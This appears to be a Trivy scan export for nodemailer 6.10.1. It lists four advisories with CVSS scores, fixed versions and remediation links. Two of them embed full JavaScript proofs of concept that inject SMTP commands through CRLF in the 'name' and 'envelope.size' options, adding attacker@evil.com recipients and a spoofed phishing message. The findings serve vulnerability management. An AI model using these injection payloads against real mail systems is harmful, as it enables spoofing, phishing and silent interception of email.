remediation: https://avd.aquasec.com/nvd/cve-2025-14874
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:nodemailer@6.10.1
|
|
risk:
|
|
cwe: &id048
|
|
- CWE-703
|
|
raw:
|
|
VulnerabilityID: CVE-2025-14874
|
|
VendorIDs:
|
|
- GHSA-rcmh-qjqh-p98v
|
|
PkgID: nodemailer@6.10.1
|
|
PkgName: nodemailer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/nodemailer@6.10.1
|
|
UID: c243d03ecfce3c20
|
|
InstalledVersion: 6.10.1
|
|
FixedVersion: 7.0.11
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-14874
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a
|
|
Title: 'nodemailer: Nodemailer: Denial of service via crafted email address header'
|
|
Description: A flaw was found in Nodemailer. This vulnerability allows a denial
|
|
of service (DoS) via a crafted email address header that triggers infinite recursion
|
|
in the address parser.
|
|
Severity: HIGH
|
|
CweIDs: *id048
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
nvd: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-14874
|
|
- https://bugzilla.redhat.com/show_bug.cgi?id=2418133
|
|
- https://github.com/nodemailer/nodemailer
|
|
- https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150
|
|
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-14874
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-14874
|
|
PublishedDate: '2025-12-18T09:15:44.87Z'
|
|
LastModifiedDate: '2026-01-08T03:15:43.19Z'
|
|
context:
|
|
sbom:
|
|
name: nodemailer
|
|
version: 6.10.1
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.477999999999998
|
|
epss: 0.00155
|
|
epss_percentile: 0.3573
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.0062
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8c54dd19fd34e976
|
|
ruleId: CVE-2025-13033
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to
|
|
Interpretation Conflict'
|
|
title: CVE-2025-13033
|
|
description: A vulnerability was identified in the email parsing library due to
|
|
improper handling of specially formatted recipient email addresses. An attacker
|
|
can exploit this flaw by crafting a recipient address that embeds an external
|
|
address within quotes. This causes the application to misdirect the email to the
|
|
attacker's external address instead of the intended internal recipient. This could
|
|
lead to a significant data leak of sensitive information and allow an attacker
|
|
to bypass security filters and access controls.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-13033
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:nodemailer@6.10.1
|
|
risk:
|
|
cwe: &id049
|
|
- CWE-1286
|
|
raw:
|
|
VulnerabilityID: CVE-2025-13033
|
|
VendorIDs:
|
|
- GHSA-mm7p-fcc7-pg87
|
|
PkgID: nodemailer@6.10.1
|
|
PkgName: nodemailer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/nodemailer@6.10.1
|
|
UID: c243d03ecfce3c20
|
|
InstalledVersion: 6.10.1
|
|
FixedVersion: 7.0.7
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-13033
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b
|
|
Title: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to
|
|
Interpretation Conflict'
|
|
Description: A vulnerability was identified in the email parsing library due to
|
|
improper handling of specially formatted recipient email addresses. An attacker
|
|
can exploit this flaw by crafting a recipient address that embeds an external
|
|
address within quotes. This causes the application to misdirect the email to
|
|
the attacker's external address instead of the intended internal recipient.
|
|
This could lead to a significant data leak of sensitive information and allow
|
|
an attacker to bypass security filters and access controls.
|
|
Severity: MEDIUM
|
|
CweIDs: *id049
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
|
|
V40Score: 5.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 7.5
|
|
References:
|
|
- https://access.redhat.com/errata/RHSA-2026:15979
|
|
- https://access.redhat.com/errata/RHSA-2026:3751
|
|
- https://access.redhat.com/security/cve/CVE-2025-13033
|
|
- https://bugzilla.redhat.com/show_bug.cgi?id=2402179
|
|
- https://github.com/nodemailer/nodemailer
|
|
- https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626
|
|
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-13033
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-13033
|
|
PublishedDate: '2025-11-14T20:15:45.957Z'
|
|
LastModifiedDate: '2026-05-11T13:16:10.037Z'
|
|
context:
|
|
sbom:
|
|
name: nodemailer
|
|
version: 6.10.1
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.349866666666665
|
|
epss: 0.00031
|
|
epss_percentile: 0.0896
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00124
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 314c4b93bbc126bb
|
|
ruleId: GHSA-vvjj-xcjg-gr5g
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport
|
|
name Option (EHLO/HELO) '
|
|
title: GHSA-vvjj-xcjg-gr5g
|
|
description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable\
|
|
\ to SMTP command injection via CRLF sequences in the transport `name` configuration\
|
|
\ option. The `name` value is used directly in the EHLO/HELO SMTP command without\
|
|
\ any sanitization for carriage return and line feed characters (`\\r\\n`). An\
|
|
\ attacker who can influence this option can inject arbitrary SMTP commands, enabling\
|
|
\ unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\
|
|
\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing\
|
|
\ an SMTP connection, the `name` option is concatenated directly into the EHLO\
|
|
\ command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name\
|
|
\ = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO\
|
|
\ ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly\
|
|
\ to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str\
|
|
\ + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences,\
|
|
\ each injected line is interpreted by the SMTP server as a separate command.\
|
|
\ Unlike the `envelope.from` and `envelope.to` fields which are validated for\
|
|
\ `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed\
|
|
\ (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives\
|
|
\ no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported\
|
|
\ GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter\
|
|
\ (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM\
|
|
\ command), and occurs at connection initialization rather than during message\
|
|
\ sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line\
|
|
\ 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\n\
|
|
const nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple\
|
|
\ SMTP server to observe injected commands\nconst server = net.createServer(socket\
|
|
\ => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data\
|
|
\ => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n\
|
|
\ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\
|
|
\ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \
|
|
\ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\
|
|
\ FROM'))\n socket.write('250 OK\\r\\n');\n else if\
|
|
\ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\
|
|
\ else if (line === 'DATA')\n socket.write('354 Go\\\
|
|
r\\n');\n else if (line === '.')\n socket.write('250\
|
|
\ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\
|
|
\ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \
|
|
\ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\
|
|
\ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\
|
|
\ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\
|
|
\ host: '127.0.0.1',\n port: port,\n secure: false,\n \
|
|
\ name: 'legit.host\\r\\nMAIL FROM:<attacker@evil.com>\\r\\n'\n \
|
|
\ + 'RCPT TO:<victim@target.com>\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\\
|
|
r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing\
|
|
\ content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from:\
|
|
\ 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject:\
|
|
\ 'Normal email',\n text: 'Normal content'\n }, () => { server.close();\
|
|
\ process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives\
|
|
\ the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate\
|
|
\ SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is\
|
|
\ affected:** Applications that allow users or external input to configure the\
|
|
\ `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms\
|
|
\ with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name\
|
|
\ settings are stored in databases\n- Applications loading SMTP config from environment\
|
|
\ variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized\
|
|
\ emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n\
|
|
2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n\
|
|
3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n\
|
|
4. **Bypass application-level controls** on email recipients, since the injected\
|
|
\ commands are processed before the application's intended MAIL FROM/RCPT TO\n\
|
|
5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\n\
|
|
The injection occurs at the EHLO stage (before authentication in most SMTP flows),\
|
|
\ making it particularly dangerous as the injected commands may be processed with\
|
|
\ the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option\
|
|
\ by stripping or rejecting CRLF sequences, similar to how `envelope.from` and\
|
|
\ `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`.\
|
|
\ For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\
|
|
r\\n]/g, '');\n```"
|
|
remediation: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:nodemailer@6.10.1
|
|
raw:
|
|
VulnerabilityID: GHSA-vvjj-xcjg-gr5g
|
|
PkgID: nodemailer@6.10.1
|
|
PkgName: nodemailer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/nodemailer@6.10.1
|
|
UID: c243d03ecfce3c20
|
|
InstalledVersion: 6.10.1
|
|
FixedVersion: 8.0.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77
|
|
Title: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport
|
|
name Option (EHLO/HELO) '
|
|
Description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are\
|
|
\ vulnerable to SMTP command injection via CRLF sequences in the transport `name`\
|
|
\ configuration option. The `name` value is used directly in the EHLO/HELO SMTP\
|
|
\ command without any sanitization for carriage return and line feed characters\
|
|
\ (`\\r\\n`). An attacker who can influence this option can inject arbitrary\
|
|
\ SMTP commands, enabling unauthorized email sending, email spoofing, and phishing\
|
|
\ attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`.\
|
|
\ When establishing an SMTP connection, the `name` option is concatenated directly\
|
|
\ into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js,\
|
|
\ line 71\nthis.name = this.options.name || this._getHostname();\n\n// line\
|
|
\ 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method\
|
|
\ writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\
|
|
\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n\
|
|
```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line\
|
|
\ is interpreted by the SMTP server as a separate command. Unlike the `envelope.from`\
|
|
\ and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119),\
|
|
\ and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8)\
|
|
\ by casting to a number, the `name` parameter receives no CRLF sanitization\
|
|
\ whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8\
|
|
\ (envelope.size injection) as it affects a different parameter (`name` vs `size`),\
|
|
\ uses a different injection point (EHLO command vs MAIL FROM command), and\
|
|
\ occurs at connection initialization rather than during message sending.\n\n\
|
|
The `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands\
|
|
\ with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer\
|
|
\ = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server\
|
|
\ to observe injected commands\nconst server = net.createServer(socket => {\n\
|
|
\ socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n\
|
|
\ const lines = data.toString().split('\\r\\n').filter(l => l);\n \
|
|
\ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\
|
|
\ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \
|
|
\ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\
|
|
\ FROM'))\n socket.write('250 OK\\r\\n');\n else if\
|
|
\ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\
|
|
\ else if (line === 'DATA')\n socket.write('354 Go\\\
|
|
r\\n');\n else if (line === '.')\n socket.write('250\
|
|
\ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\
|
|
\ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \
|
|
\ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\
|
|
\ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\
|
|
\ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\
|
|
\ host: '127.0.0.1',\n port: port,\n secure: false,\n \
|
|
\ name: 'legit.host\\r\\nMAIL FROM:<attacker@evil.com>\\r\\n'\n \
|
|
\ + 'RCPT TO:<victim@target.com>\\r\\nDATA\\r\\n'\n + 'From:\
|
|
\ ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject:\
|
|
\ Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n\
|
|
\ from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n\
|
|
\ subject: 'Normal email',\n text: 'Normal content'\n }, ()\
|
|
\ => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows\
|
|
\ the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing\
|
|
\ email content as separate SMTP commands before the legitimate email is sent.\n\
|
|
\n### Impact\n\n**Who is affected:** Applications that allow users or external\
|
|
\ input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant\
|
|
\ SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP\
|
|
\ hostname/name settings are stored in databases\n- Applications loading SMTP\
|
|
\ config from environment variables or external sources\n\n**What can an attacker\
|
|
\ do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting\
|
|
\ MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary\
|
|
\ From headers in the DATA portion\n3. **Conduct phishing attacks** using the\
|
|
\ legitimate SMTP server as a relay\n4. **Bypass application-level controls**\
|
|
\ on email recipients, since the injected commands are processed before the\
|
|
\ application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance**\
|
|
\ by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO\
|
|
\ stage (before authentication in most SMTP flows), making it particularly dangerous\
|
|
\ as the injected commands may be processed with the server's trust context.\n\
|
|
\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting\
|
|
\ CRLF sequences, similar to how `envelope.from` and `envelope.to` are already\
|
|
\ validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\
|
|
\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\
|
|
r\\n]/g, '');\n```"
|
|
Severity: MEDIUM
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
|
|
V3Score: 4.9
|
|
References:
|
|
- https://github.com/nodemailer/nodemailer
|
|
- https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e
|
|
- https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5
|
|
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g
|
|
PublishedDate: '2026-04-08T15:05:20Z'
|
|
LastModifiedDate: '2026-04-08T15:05:20Z'
|
|
context:
|
|
sbom:
|
|
name: nodemailer
|
|
version: 6.10.1
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.333333333333332
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 17548d349adde40e
|
|
ruleId: GHSA-c7w3-x93f-qmm8
|
|
severity: LOW
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Nodemailer has SMTP command injection due to unsanitized `envelope.size`
|
|
parameter
|
|
title: GHSA-c7w3-x93f-qmm8
|
|
description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\
|
|
\ with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated\
|
|
\ directly into the SMTP `MAIL FROM` command without sanitization. This allows\
|
|
\ injection of arbitrary SMTP commands, including `RCPT TO` \u2014 silently adding\
|
|
\ attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js`\
|
|
\ (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL\
|
|
\ FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size\
|
|
\ && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n\
|
|
}\n```\n\nThis contrasts with other envelope parameters in the same function that\
|
|
\ ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\\
|
|
r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`):\
|
|
\ encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches\
|
|
\ this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js`\
|
|
\ (lines 854-858), which copies all non-standard envelope properties verbatim:\n\
|
|
\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key\
|
|
\ => {\n if (!standardFields.includes(key)) {\n this._envelope[key]\
|
|
\ = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command\
|
|
\ string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value\
|
|
\ terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by\
|
|
\ default, Nodemailer constructs the envelope automatically from the message's\
|
|
\ `from`/`to` fields and does not include `size`. This vulnerability requires\
|
|
\ the application to explicitly pass a custom `envelope` object with a `size`\
|
|
\ property to `sendMail()`. \nWhile this limits the attack surface, applications\
|
|
\ that expose envelope configuration to users are affected.\n\n### PoC\nave the\
|
|
\ following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net\
|
|
\ = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP\
|
|
\ server that logs raw commands\nconst server = net.createServer(socket => {\n\
|
|
\ socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data',\
|
|
\ chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\\
|
|
r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\
|
|
\ if (!line) continue;\n console.log('C:', line);\n \
|
|
\ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\
|
|
r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\
|
|
\ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\
|
|
\ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\\
|
|
n');\n } else if (line === 'DATA') {\n socket.write('354\
|
|
\ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\
|
|
\ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \
|
|
\ socket.write('221 Bye\\r\\n');\n socket.end();\n \
|
|
\ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n \
|
|
\ const port = server.address().port;\n console.log('SMTP server on port',\
|
|
\ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n \
|
|
\ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\
|
|
\ port,\n secure: false,\n tls: { rejectUnauthorized: false\
|
|
\ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\
|
|
\ to: 'recipient@example.com',\n subject: 'Normal email',\n \
|
|
\ text: 'This is a normal email.',\n envelope: {\n from:\
|
|
\ 'sender@example.com',\n to: ['recipient@example.com'],\n \
|
|
\ size: '100\\r\\nRCPT TO:<attacker@evil.com>',\n },\n }, (err) =>\
|
|
\ {\n if (err) console.error('Error:', err.message);\n console.log('\\\
|
|
nExpected output above:');\n console.log(' C: MAIL FROM:<sender@example.com>\
|
|
\ SIZE=100');\n console.log(' C: RCPT TO:<attacker@evil.com> <--\
|
|
\ INJECTED');\n console.log(' C: RCPT TO:<recipient@example.com>');\n\
|
|
\ server.close();\n transporter.close();\n });\n});\n```\n\n\
|
|
**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\
|
|
\ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:<sender@example.com> SIZE=100\n\
|
|
C: RCPT TO:<attacker@evil.com>\nC: RCPT TO:<recipient@example.com>\nC: DATA\n\
|
|
...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:<attacker@evil.com>` line is injected\
|
|
\ by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\
|
|
\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who\
|
|
\ can influence the `envelope.size` property in a `sendMail()` call can:\n\n-\
|
|
\ **Silently add hidden recipients** to outgoing emails via injected `RCPT TO`\
|
|
\ commands, receiving copies of all emails sent through the affected transport\n\
|
|
- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to\
|
|
\ send entirely separate emails through the server)\n- **Leverage the sending\
|
|
\ organization's SMTP server reputation** for spam or phishing delivery\n\nThe\
|
|
\ severity is mitigated by the fact that the `envelope` object must be explicitly\
|
|
\ provided by the application. Nodemailer's default envelope construction from\
|
|
\ message headers does not include `size`. Applications that pass through user-controlled\
|
|
\ data to the envelope options (e.g., via API parameters, admin panels, or template\
|
|
\ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\
|
|
\ likely all versions where `envelope.size` is supported."
|
|
remediation: https://github.com/advisories/GHSA-c7w3-x93f-qmm8
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:nodemailer@6.10.1
|
|
raw:
|
|
VulnerabilityID: GHSA-c7w3-x93f-qmm8
|
|
PkgID: nodemailer@6.10.1
|
|
PkgName: nodemailer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/nodemailer@6.10.1
|
|
UID: c243d03ecfce3c20
|
|
InstalledVersion: 6.10.1
|
|
FixedVersion: 8.0.4
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://github.com/advisories/GHSA-c7w3-x93f-qmm8
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e
|
|
Title: Nodemailer has SMTP command injection due to unsanitized `envelope.size`
|
|
parameter
|
|
Description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\
|
|
\ with a `size` property containing CRLF characters (`\\r\\n`), the value is\
|
|
\ concatenated directly into the SMTP `MAIL FROM` command without sanitization.\
|
|
\ This allows injection of arbitrary SMTP commands, including `RCPT TO` \u2014\
|
|
\ silently adding attacker-controlled recipients to outgoing emails.\n\n\n###\
|
|
\ Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size`\
|
|
\ value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\
|
|
\n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE'))\
|
|
\ {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts\
|
|
\ with other envelope parameters in the same function that ARE properly sanitized:\n\
|
|
- **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n\
|
|
- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()`\
|
|
\ at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()`\
|
|
\ in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard\
|
|
\ envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to',\
|
|
\ 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key))\
|
|
\ {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince\
|
|
\ `_sendCommand()` writes the command string followed by `\\r\\n` to the raw\
|
|
\ TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command\
|
|
\ and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs\
|
|
\ the envelope automatically from the message's `from`/`to` fields and does\
|
|
\ not include `size`. This vulnerability requires the application to explicitly\
|
|
\ pass a custom `envelope` object with a `size` property to `sendMail()`. \n\
|
|
While this limits the attack surface, applications that expose envelope configuration\
|
|
\ to users are affected.\n\n### PoC\nave the following as `poc.js` and run with\
|
|
\ `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer\
|
|
\ = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\n\
|
|
const server = net.createServer(socket => {\n socket.write('220 localhost\
|
|
\ ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n \
|
|
